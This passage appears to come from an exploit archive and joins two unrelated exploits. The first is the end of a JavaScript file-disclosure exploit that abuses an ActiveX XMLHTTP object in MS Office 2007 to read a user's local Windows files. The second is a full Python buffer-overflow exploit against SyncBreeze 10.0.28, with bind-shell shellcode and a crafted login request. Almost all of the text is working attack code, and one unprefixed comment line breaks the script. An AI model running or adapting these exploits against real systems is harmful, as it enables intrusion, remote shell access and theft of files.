var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);
var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced
// through the default "C$" share.
var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
// change the above path to match another file you wish to grab the contents.
var t = loc.indexOf("c:"); // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
var tr = loc.indexOf("c$");
// First pass: the document was opened from a local "c:" path, so it embeds the same path
// again through file://127.0.0.1/c$ in an iframe.
if (t != -1)
{
var ns = loc.substring(t+2,loc.length);
document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
}
// Second pass: the URL now contains "c$", so the target file is requested with XMLHTTP.
else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
// The third argument 0 makes the request synchronous.
x.Open("GET",fileToDisclose,0);
x.Send();
// fileContents is assigned without var and therefore becomes a global.
fileContents = x.ResponseText;
alert(fileContents);
}
</script>
</body>
</html>
-------------------------------------------------------------------------------------------------------------------
Vulnerable: MS Office 2007
MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.
Tested on: Any Windows version that supports Office 2007.
Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
# Exploit Title: [SyncBreeze POST username overflow]
# Date: [30-Sep-2017]
# Exploit Author: [Owais Mehtab]
# Vendor Homepage: [http://www.syncbreeze.com]
# Software Link: [http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe]
# Version: [10.0.28]
# Tested on: [Windows 7]
#!/usr/bin/python
import socket
import os
import sys
crash = "A" * 1000
# jmp = 10 09 0c 83 libspp.dll
# bad char = 00 0A 0D 25 26 2B 3D
bind shell on port 4444
buf = ""
buf += "\xb8\x3b\xcc\xbe\xaa\xdb\xd2\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x53\x31\x43\x12\x83\xc3\x04\x03\x78\xc2\x5c"
buf += "\x5f\x82\x32\x22\xa0\x7a\xc3\x43\x28\x9f\xf2\x43\x4e"
buf += "\xd4\xa5\x73\x04\xb8\x49\xff\x48\x28\xd9\x8d\x44\x5f"
buf += "\x6a\x3b\xb3\x6e\x6b\x10\x87\xf1\xef\x6b\xd4\xd1\xce"
buf += "\xa3\x29\x10\x16\xd9\xc0\x40\xcf\x95\x77\x74\x64\xe3"
buf += "\x4b\xff\x36\xe5\xcb\x1c\x8e\x04\xfd\xb3\x84\x5e\xdd"
buf += "\x32\x48\xeb\x54\x2c\x8d\xd6\x2f\xc7\x65\xac\xb1\x01"
buf += "\xb4\x4d\x1d\x6c\x78\xbc\x5f\xa9\xbf\x5f\x2a\xc3\xc3"
buf += "\xe2\x2d\x10\xb9\x38\xbb\x82\x19\xca\x1b\x6e\x9b\x1f"
buf += "\xfd\xe5\x97\xd4\x89\xa1\xbb\xeb\x5e\xda\xc0\x60\x61"
buf += "\x0c\x41\x32\x46\x88\x09\xe0\xe7\x89\xf7\x47\x17\xc9"
buf += "\x57\x37\xbd\x82\x7a\x2c\xcc\xc9\x12\x81\xfd\xf1\xe2"
buf += "\x8d\x76\x82\xd0\x12\x2d\x0c\x59\xda\xeb\xcb\x9e\xf1"
buf += "\x4c\x43\x61\xfa\xac\x4a\xa6\xae\xfc\xe4\x0f\xcf\x96"
buf += "\xf4\xb0\x1a\x02\xfc\x17\xf5\x31\x01\xe7\xa5\xf5\xa9"
buf += "\x80\xaf\xf9\x96\xb1\xcf\xd3\xbf\x5a\x32\xdc\xae\xc6"
buf += "\xbb\x3a\xba\xe6\xed\x95\x52\xc5\xc9\x2d\xc5\x36\x38"
buf += "\x06\x61\x7e\x2a\x91\x8e\x7f\x78\xb5\x18\xf4\x6f\x01"
buf += "\x39\x0b\xba\x21\x2e\x9c\x30\xa0\x1d\x3c\x44\xe9\xf5"
buf += "\xdd\xd7\x76\x05\xab\xcb\x20\x52\xfc\x3a\x39\x36\x10"
buf += "\x64\x93\x24\xe9\xf0\xdc\xec\x36\xc1\xe3\xed\xbb\x7d"
buf += "\xc0\xfd\x05\x7d\x4c\xa9\xd9\x28\x1a\x07\x9c\x82\xec"
buf += "\xf1\x76\x78\xa7\x95\x0f\xb2\x78\xe3\x0f\x9f\x0e\x0b"
buf += "\xa1\x76\x57\x34\x0e\x1f\x5f\x4d\x72\xbf\xa0\x84\x36"
buf += "\xcf\xea\x84\x1f\x58\xb3\x5d\x22\x05\x44\x88\x61\x30"
buf += "\xc7\x38\x1a\xc7\xd7\x49\x1f\x83\x5f\xa2\x6d\x9c\x35"
buf += "\xc4\xc2\x9d\x1f"
# Assembles the request body and sends it once over a raw TCP socket.
# This rebinds crash; the "A" * 1000 value assigned earlier in the script is discarded.
# Defender note: the resulting POST /login body carries a username field well over
# 780 bytes long that contains non-printable bytes, so a length or character-set
# check on that field at a proxy or WAF would flag this request.
crash = "A" * 780 + "\x83\x0c\x09\x10" + "\x90"*16 + buf
fuzz="username="+crash+"&password=A"
# The target address is hard-coded in the Host and Referer headers and in connect() below.
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.211.149\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.211.149/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
# Content-Length is computed from the body, so the declared and actual lengths agree.
buffer+="Content-Length: "+str(len(fuzz))+"\r\n"
buffer+="\r\n"
buffer+=fuzz
expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.211.149", 80))
# send() is called once and its return value is ignored; the response is never read.
# NOTE(review): passing a str to send() assumes Python 2 string semantics; confirm the interpreter.
expl.send(buffer)
expl.close()